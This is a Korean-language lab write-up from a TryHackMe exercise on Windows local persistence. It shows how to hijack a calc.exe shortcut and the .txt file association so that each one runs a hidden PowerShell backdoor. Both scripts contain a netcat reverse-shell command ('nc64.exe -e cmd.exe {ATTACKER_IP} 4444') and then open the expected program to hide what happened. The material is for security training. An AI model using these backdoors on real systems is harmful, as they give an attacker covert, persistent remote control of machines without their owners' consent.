THM - Windows Local Persistence (2)

Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술

* 참고 : MITRE ATT&CK

 

TASK 3

3.1 Executable Files

바탕화면에 calc.exe 바로가기가 있다고 가정

 

1) PS 스크립트 만들기

# C:\Windows\System32\backdoor.ps1

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444"
C:\Windows\System32\calc.exe

 

2) 바탕화면에 있는 calc.exe 바로가기의 Target 변경

# target
# PowerShell 스크립트가 숨겨진 창에서 실행
powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

 

3) 아이콘도 기존의 calc.exe로 변경

 

 

3.2 Hijacking File Associations

사용자가 특정 파일 형식을 열 때마다 운영 체제가 강제로 셸을 실행하도록 모든 파일 연결을 하이재킹할 수 있다.

파일 형식은 HKLM\Software\Classes\ 레지스트리에서 확인 가능하며, txt 파일을 타겟으로 실습해보자.

 

1) ProgID 찾기

.txt의 ProgID 는 txtfile이다.

 

 

2) ProgID에 해당하는 파일에 대해 실행될 명령 확인

HKLM\Software\Classes\{ProgID}\shell\open\command에서 해당 확장자를 가진 파일에 대해 실행될 기본 명령을 확인할 수 있다.

 

 

3) PS 스크립트 만들기

# C:\Windows\backdoor2.ps1.

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444"
C:\Windows\system32\NOTEPAD.EXE $args[0]

 

4) 기본명령 변경

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor2.ps1